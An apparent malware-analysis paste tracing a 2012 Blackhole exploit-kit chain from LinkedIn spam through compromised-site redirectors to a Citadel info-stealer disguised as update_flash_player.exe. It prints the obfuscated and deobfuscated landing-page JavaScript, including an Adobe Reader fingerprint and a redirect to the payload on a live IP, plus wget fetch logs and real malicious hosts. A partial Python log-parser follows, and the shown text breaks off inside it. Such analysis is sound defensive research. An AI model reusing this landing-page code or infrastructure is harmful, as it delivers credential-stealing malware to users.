- ===========================================
- #MalwareMustDie!!!!!!!!!!
- INFECTION OF CITADEL WITH BHEK
- BHEK IS USING PARAMETER e & f
- Exploit Method: AcroPDF.PDF
- Payload download Method: Msxml2.XMLHTTP
- Payload : Citadel/Trojan Password/InfoStealer
- VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
- ===========
- Only VT6/43 !!!!
- ==========
- DrWeb : Trojan.PWS.Stealer.946
- Norman : W32/Krypt.GB
- McAfee-GW-Edition : PWS-Zbot.gen.aln
- McAfee : PWS-Zbot.gen.aln
- Fortinet : W32/Kryptik.WDV!tr
- Panda : Suspicious file
- Summary:
- This trojan sends data from the infected PC to 108.178.59.34 over encrypted
- HTTP communication (see the network connection report below),
- and also downloads other malware:
- * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
- * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
- ----------------------------
- Set of infected file:
- ----------------------------
- assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
- index.html.2 ad967ba32c54c59db0f4a947410d96f2
- js.js d20a786ec45f68eb56f15a589c566b27
- js.js.1 d20a786ec45f68eb56f15a589c566b27
- js.js.2 d20a786ec45f68eb56f15a589c566b27
- LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
- update_flash_player.exe bb53221e4220466c876dbfad9cede066
- PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
- ===========================================
- FULL ANALYSIS / #MalwareMustDie / @unixfreaxjp
- ===========================================
- //LinkedIn Spam;
- http://pastebin.com/raw.php?i=n7rppRJY
- #Hint from @Xylit0l < Merci!!!!!!!!
- //infected url detected:
- ...Privately</span></a></div></td></tr></table>
- (LINE 170): <a href="http://www.nikecup.net/MSmxYk/index.html" style="color:#006699;
- font-family:Arial,sans-serif;font-size:12px;text-decoration:none">Chase Mathis</a>
- ---------------------------------------
- //download PoC
- --12:24:18-- http://www.nikecup.net/MSmxYk/index.html
- => `index.html.2'
- Resolving www.nikecup.net... 62.149.131.163
- Connecting to www.nikecup.net|62.149.131.163|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 422 [text/html]
- 12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
- --------------------------------
- // cat the mess
- <html>
- <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
- <script type="text/javascript" src="http://alpuyecamorelos.com/dycYbDyw/js.js"></script>
- <script type="text/javascript" src="http://videorender.com.ar/kSWEngwv/js.js"></script>
- <script type="text/javascript" src="http://jbrnh.com/3ZKtSw8d/js.js"></script>
- </html>
- ----------------------------------
- // fetch the js.js, noted: referer
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://www.nikecup.net/MSmxYk/index.html"
- --target="http://jbrnh.com/3ZKtSw8d/js.js"
- --12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
- => `js.js'
- Resolving alpuyecamorelos.com... 209.62.88.194
- Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/javascript]
- 12:30:38 (2.29 MB/s) - `js.js' saved [73/73]
- --12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
- => `js.js.1'
- Resolving videorender.com.ar... 174.37.144.224
- Connecting to videorender.com.ar|174.37.144.224|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/javascript]
- 12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]
- --12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
- => `js.js.2'
- Resolving jbrnh.com... 184.168.101.248
- Connecting to jbrnh.com|184.168.101.248|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/x-javascript]
- 12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]
- // all three have the same contents ↑
- -----------------------------
- // cat the mess (js.js)
- document.location='http://108.178.59.34/links/assure_numb_engineers.php';
- ----------------------------
- // fetch the mess, noted: referer, user agent
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://www.nikecup.net/MSmxYk/index.html"
- --target="http://108.178.59.34/links/assure_numb_engineers.php"
- --12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
- => `assure_numb_engineers.php'
- Connecting to 108.178.59.34:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
- ----------------------------
- // Voila.. PluginDetect.. wrapped in an obfuscated blob..
- <html><head><title></title></head><body><div dqa="asd"></div><scri
- 0-9a-z]/g,k);};g="getEleme";p=parseInt;cc="co";ss=String.fromCharC
- nction asd(){e=window["eval"];e(s);}ddd="ad".substr(1);sss="sub"+"
- (i);};g+="ntB"+"yId";</script><u id="google" 45="1b43391a(1b454545
- >
- if(020==0x10)d=document;
- try{(d+"523")()}catch(dsgdsg){a=d[g](gg
- s="";
- for(i=0;;i++){
- window.asd2();
- if(r){s=s+r;}else break;
- }
- a=s;
- s="";
- k="";
- asd3();
- qa=0x1e;
- for(i=0;i<a.length;i+=2){
- s+=ss(p(a[sss](i,2),qa));
- }
- asd();
- </script></body></html>
- --------------------------------------------------------
- // deobfs the code
- try {
- var PluginDetect = {
- version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
- return function (){
- c(b, a)
- }
- }
- , isDefined : function (b){
- return typeof b != "undefined"
- }
- , isArray : function (b){
- return (/array/i).test(Object.prototype.toString.call(b))
- }
- , isFunc : function (b){
- return typeof b == "function"
- }
- , isString : function (b){
- return typeof b == "string"
- }
- , isNum : function (b){
- return typeof b == "number"
- }
- , isStrNum : function (b){
- return (typeof b == "string" && (/\d/).test(b))
- }
- , getNumRegx : /[\d][\d\.\_,-]*/, splitNumRegx : /[\.\_,-]/g,
- getNum : function (b, c){
- var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
- exec(b) : null;
- return a ? a[0] : null
- }
- , compareNums : function (h, f, d){
- var e = this , c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)){
- if (e.isDefined(d) && d.compareNums){
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length);
- a ++ ){
- if (g(c[a], 10) > g(b[a], 10)){
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)){
- return - 1
- }
- }
- }
- return 0
- }
- , formatNum : function (b, c){
- var d = this , a, e;
- if (!d.isStrNum(b)){
- return null
- }
- if (!d.isNum(c)){
- c = 4
- }
- c--;
- e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (a = 0; a < 4; a ++ ){
- if (/^(0+)(.+)$/.test(e[a])){
- e[a] = RegExp.$2
- }
- if (a > c ||! (/\d/).test(e[a])){
- e[a] = "0"
- }
- }
- return e.slice(0, 4).join(",")
- }
- , $$hasMimeType : function (a){
- return function (c){
- if (!a.isIE && c){
- var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
- for (b = 0; b < d.length; b ++ ){
- if (a.isString(d[b]) && /[^\s]/.test(d[b])){
- f = navigator.mimeTypes[d[b]];
- e = f ? f.enabledPlugin : 0;
- if (e && (e.name || e.description)){
- return f
- }
- }
- }
- }
- return null
- }
- }
- , findNavPlugin : function (l, e, c){
- var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
- new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
- for (f = 0; f < a.length; f ++ ){
- m = a[f].description || g;
- b = a[f].name || g;
- if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
- test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
- if (!k ||! (k.test(m) || k.test(b))){
- return a[f]
- }
- }
- }
- return null
- }
- , getMimeEnabledPlugin : function (k, m, c){
- var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
- l, d, j = e.isString(k) ? [k] : k;
- for (d = 0; d < j.length; d ++ ){
- if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
- l = f.description || h;
- a = f.name || h;
- if (b.test(l) || b.test(a)){
- if (!g ||! (g.test(l) || g.test(a))){
- return f
- }
- }
- }
- }
- return 0
- }
- , getPluginFileVersion : function (f, b){
- var h = this , e, d, g, a, c = -1;
- if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
- return b
- }
- if (!b){
- return e
- }
- e = h.formatNum(e);
- b = h.formatNum(b);
- d = b.split(h.splitNumRegx);
- g = e.split(h.splitNumRegx);
- for (a = 0; a < d.length; a ++ ){
- if (c > -1 && a > c && d[a] != "0"){
- return b
- }
- if (g[a] != d[a]){
- if (c == -1){
- c = a
- }
- if (d[a] != "0"){
- return b
- }
- }
- }
- return e
- }
- , AXO : window.ActiveXObject, getAXO : function (a){
- var f = null, d, b = this , c = {
- }
- ;
- try {
- f = new b.AXO(a)
- }
- catch (d){
- }
- return f
- }
- , convertFuncs : function (f){
- var a, g, d, b = /^[\$][\$]/, c = this ;
- for (a in f){
- if (b.test(a)){
- try {
- g = a.slice(2);
- if (g.length > 0 &&! f[g]){
- f[g] = f[a](f);
- delete f[a]
- }
- }
- catch (d){
- }
- }
- }
- }
- , initObj : function (e, b, d){
- var a, c;
- if (e){
- if (e[b[0]] == 1 || d){
- for (a = 0; a < b.length; a = a + 2){
- e[b[a]] = b[a + 1]
- }
- }
- for (a in e){
- c = e[a];
- if (c && c[b[0]] == 1){
- this.initObj(c, b)
- }
- }
- }
- }
- , initScript : function (){
- var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
- b = a.platform || "", h = a.product || "";
- c.initObj(c, ["$", c]);
- for (f in c.Plugins){
- if (c.Plugins[f]){
- c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
- }
- }
- ;
- c.OS = 100;
- if (b){
- var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
- 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
- , 100];
- for (f = d.length - 2; f >= 0; f = f - 2){
- if (d[f] && new RegExp(d[f], "i").test(b)){
- c.OS = d[f + 1];
- break
- }
- }
- }
- c.convertFuncs(c);
- c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
- "body")[0] || document.body || null);
- c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
- c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
- null ;
- c.ActiveXEnabled = false;
- if (c.isIE){
- var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
- "Scripting.Dictionary", "wmplayer.ocx"];
- for (f = 0; f < j.length; f ++ ){
- if (c.getAXO(j[f])){
- c.ActiveXEnabled = true;
- break
- }
- }
- }
- c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
- c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
- "0.9") : null;
- c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
- c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
- /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
- RegExp.$1) : null;
- c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
- c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
- parseFloat(RegExp.$1, 10) : null;
- c.addWinEvent("load", c.handler(c.runWLfuncs, c))
- }
- , init : function (d){
- var c = this , b, d, a = {
- status : -3, plugin : 0
- }
- ;
- if (!c.isString(d)){
- return a
- }
- if (d.length == 1){
- c.getVersionDelimiter = d;
- return a
- }
- d = d.toLowerCase().replace(/\s/g, "");
- b = c.Plugins[d];
- if (!b ||! b.getVersion){
- return a
- }
- a.plugin = b;
- if (!c.isDefined(b.installed)){
- b.installed = null;
- b.version = null;
- b.version0 = null;
- b.getVersionDone = null;
- b.pluginName = d
- }
- c.garbage = false;
- if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
- a.status = -2;
- return a
- }
- a.status = 1;
- return a
- }
- , fPush : function (b, a){
- var c = this ;
- if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
- ])))){
- a.push(b)
- }
- }
- , callArray : function (b){
- var c = this , a;
- if (c.isArray(b)){
- for (a = 0; a < b.length; a ++ ){
- if (b[a] === null){
- return
- }
- c.call(b[a]);
- b[a] = null
- }
- }
- }
- , call : function (c){
- var b = this , a = b.isArray(c) ? c.length : -1;
- if (a > 0 && b.isFunc(c[0])){
- c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
- }
- else {
- if (b.isFunc(c)){
- c(b)
- }
- }
- }
- , getVersionDelimiter : ",", $$getVersion : function (a){
- return function (g, d, c){
- var e = a.init(g), f, b, h = {
- }
- ;
- if (e.status < 0){
- return null
- }
- ;
- f = e.plugin;
- if (f.getVersionDone != 1){
- f.getVersion(null, d, c);
- if (f.getVersionDone === null){
- f.getVersionDone = 1
- }
- }
- a.cleanup();
- b = (f.version || f.version0);
- b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
- return b
- }
- }
- , cleanup : function (){
- }
- , addWinEvent : function (d, c){
- var e = this , a = window, b;
- if (e.isFunc(c)){
- if (a.addEventListener){
- a.addEventListener(d, c, false)
- }
- else {
- if (a.attachEvent){
- a.attachEvent("on" + d, c)
- }
- else {
- b = a["on" + d];
- a["on" + d] = e.winHandler(c, b)
- }
- }
- }
- }
- , winHandler : function (d, c){
- return function (){
- d();
- if (typeof c == "function"){
- c()
- }
- }
- }
- , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
- var b = {
- }
- ;
- a.winLoaded = true;
- a.callArray(a.WLfuncs0);
- a.callArray(a.WLfuncs);
- if (a.onDoneEmptyDiv){
- a.onDoneEmptyDiv()
- }
- }
- , winLoaded : false, $$onWindowLoaded : function (a){
- return function (b){
- if (a.winLoaded){
- a.call(b)
- }
- else {
- a.fPush(b, a.WLfuncs)
- }
- }
- }
- , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
- function (){
- var d = this , b, h, c, a, f, g;
- if (d.div && d.div.childNodes){
- for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
- c = d.div.childNodes[b];
- if (c && c.childNodes){
- for (h = c.childNodes.length - 1; h >= 0; h -- ){
- g = c.childNodes[h];
- try {
- c.removeChild(g)
- }
- catch (f){
- }
- }
- }
- if (c){
- try {
- d.div.removeChild(c)
- }
- catch (f){
- }
- }
- }
- }
- if (!d.div){
- a = document.getElementById(d.divID);
- if (a){
- d.div = a
- }
- }
- if (d.div && d.div.parentNode){
- try {
- d.div.parentNode.removeChild(d.div)
- }
- catch (f){
- }
- d.div = null
- }
- }
- , DONEfuncs : [], onDoneEmptyDiv : function (){
- var c = this , a, b;
- if (!c.winLoaded){
- return
- }
- if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
- return
- }
- for (a in c){
- b = c[a];
- if (b && b.funcs){
- if (b.OTF == 3){
- return
- }
- if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
- return
- }
- }
- }
- for (a = 0; a < c.DONEfuncs.length; a ++ ){
- c.callArray(c.DONEfuncs)
- }
- c.emptyDiv()
- }
- , getWidth : function (c){
- if (c){
- var a = c.scrollWidth || c.offsetWidth, b = this ;
- if (b.isNum(a)){
- return a
- }
- }
- return - 1
- }
- , getTagStatus : function (m, g, a, b){
- var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
- g.span, i = c.getWidth(d);
- if (!k ||! h ||! d ||! c.getDOMobj(m)){
- return - 2
- }
- if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
- return 0
- }
- if (l >= i){
- return - 1
- }
- try {
- if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
- if (!m.winLoaded && c.winLoaded){
- return 1
- }
- if (m.winLoaded && c.isNum(b)){
- if (!c.isNum(m.count)){
- m.count = b
- }
- if (b - m.count >= 10){
- return 1
- }
- }
- }
- }
- catch (f){
- }
- return 0
- }
- , getDOMobj : function (g, a){
- var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
- try {
- if (b && a){
- d.div.focus()
- }
- }
- catch (f){
- }
- return b ? c.firstChild : null
- }
- , setStyle : function (b, g){
- var f = b.style, a, d, c = this ;
- if (f && g){
- for (a = 0; a < g.length; a = a + 2){
- try {
- f[g[a]] = g[a + 1]
- }
- catch (d){
- }
- }
- }
- }
- , insertDivInBody : function (a, i){
- var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
- document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
- if (!g){
- try {
- j.write(c + 'div id="' + b + '">o' + c + "/div>");
- d = j.getElementById(b)
- }
- catch (h){
- }
- }
- g = (j.getElementsByTagName("body")[0] || j.body);
- if (g){
- if (g.firstChild && f.isDefined(g.insertBefore)){
- g.insertBefore(a, g.firstChild)
- }
- else {
- g.appendChild(a)
- }
- if (d){
- g.removeChild(d)
- }
- }
- else {
- }
- }
- , insertHTML : function (g, b, h, a, l){
- var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
- var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
- "0px", "visibility", "visible"];
- var i =
- "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
- if (!k.isDefined(a)){
- a = ""
- }
- if (k.isString(g) && (/[^\s]/).test(g)){
- g = g.toLowerCase().replace(/\s/g, "");
- q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
- q += 'style="' + i + 'display:inline;" ';
- for (o = 0; o < b.length; o = o + 2){
- if (/[^\s]/.test(b[o + 1])){
- q += b[o] + '="' + b[o + 1] + '" '
- }
- }
- q += ">";
- for (o = 0; o < h.length; o = o + 2){
- if (/[^\s]/.test(h[o + 1])){
- q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
- }
- }
- q += a + f + "/" + g + ">"
- }
- else {
- q = a
- }
- if (!k.div){
- j = n.getElementById(k.divID);
- if (j){
- k.div = j
- }
- else {
- k.div = n.createElement("div");
- k.div.id = k.divID
- }
- k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
- 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
- + "px", "verticalAlign", "baseline", "display", "block"]));
- if (!j){
- k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
- k.insertDivInBody(k.div)
- }
- }
- if (k.div && k.div.parentNode){
- k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
- pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
- try {
- p.innerHTML = q
- }
- catch (m){
- }
- ;
- try {
- k.div.appendChild(p)
- }
- catch (m){
- }
- ;
- return {
- span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
- }
- }
- return {
- span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
- }
- }
- , Plugins : {
- adobereader : {
- mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- {
- }
- , pluginHasMimeType : function (d, c, f){
- var b = this , e = b.$, a;
- for (a in d){
- if (d[a] && d[a].type && d[a].type == c){
- return 1
- }
- }
- if (e.getMimeEnabledPlugin(c, f)){
- return 1
- }
- return 0
- }
- , getVersion : function (l, j){
- var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
- if (d.isString(j)){
- j = j.replace(/\s/g, "");
- if (j){
- k = j
- }
- }
- else {
- j = null
- }
- if (d.isDefined(g.INSTALLED[k])){
- g.installed = g.INSTALLED[k];
- return
- }
- if (!d.isIE){
- a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
- if (g.getVersionDone !== 0){
- g.getVersionDone = 0;
- b = d.getMimeEnabledPlugin(g.mimeType, a);
- if (!j){
- n = b
- }
- if (!b && d.hasMimeType(g.mimeType)){
- b = d.findNavPlugin(a, 0)
- }
- if (b){
- g.navPluginObj = b;
- h = d.getNum(b.description) || d.getNum(b.name);
- h = d.getPluginFileVersion(b, h);
- if (!h && d.OS == 1){
- if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
- h = "9"
- }
- else {
- if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
- h = "8"
- }
- }
- }
- }
- }
- else {
- h = g.version
- }
- if (!d.isDefined(n)){
- n = d.getMimeEnabledPlugin(k, a)
- }
- g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
- }
- else {
- b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
- c = /=\s*([\d\.]+)/g;
- try {
- f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
- ""], "", g))).GetVersions();
- for (m = 0; m < 5; m ++ ){
- if (c.test(f) && (!h || RegExp.$1 > h)){
- h = RegExp.$1
- }
- }
- }
- catch (i){
- }
- g.installed = h ? 1 : (b ? 0 : -1)
- }
- if (!g.version){
- g.version = d.formatNum(h)
- }
- g.INSTALLED[k] = g.installed
- }
- }
- , zz : 0
- }
- }
- ;
- PluginDetect.initScript();
- PluginDetect.getVersion(".");
- pdfver = PluginDetect.getVersion("AdobeReader");
- }
- catch (e){
- }
- if (typeof pdfver == 'string'){
- pdfver = pdfver.split('.')
- }
- else {
- pdfver = [0, 0, 0, 0]
- }
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i) - 46).toString(16);
- if (k.length == 1)k = "0" + k;
- d.push(k);
- }
- ;
- return d.join("");
- }
- end_redirect = function (){
- window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
- }
- ;
- window.onbeforeunload = function (){
- return "";
- }
- ;
- document.write('');
- setTimeout(end_redirect, 60000);
- ------------------------------------
- // infection analysis per exploit & PluginDetect hint..
- ===================
- EXPLOIT-ED BY:
- ===================
- // , Plugins : {
- // adobereader : {
- // mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- // "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- ===================
- DOWNLOADED VIA:
- ===================
- // var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- // "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
- // "Scripting.Dictionary", "wmplayer.ocx"];
- // for (f = 0; f < j.length; f ++ ){
- // if (c.getAXO(j[f])){
- // c.ActiveXEnabled = true;
- // break
- *********** Please note the parameters: var f, j *****************
- ===================
- TO URL:
- ===================
- // end_redirect = function (){
- // window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
- //
- --------------download PoC------------------------------------------------
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://108.178.59.34/links/assure_numb_engineers.php"
- --target="http://108.178.59.34/adobe/update_flash_player.exe"
- --12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
- => `update_flash_player.exe'
- Connecting to 108.178.59.34:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 150,616 (147K) [application/octet-stream]
- 12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD
- ---------------INFECTION CROSS REFERENCE AUTOMATION------------------
- [2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
- [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
- [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
- [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
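- // added example (not code from the paste or from the automation tool): a small Python parser for the cross-reference log above. It rebuilds the hop graph from the Referrer fields and the document.location lines, groups URLs that served byte-identical content by MD5, and reports which hosts were reached only through a document.location hop and what status they returned to the crawler (403 here, next to the 200 the manual wget above got). LOG is a subset of the lines above, embedded so the script runs offline.

```python
import re
from collections import deque
from urllib.parse import urlsplit

# Subset of the cross-reference log lines from the paste.
LOG = """\
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
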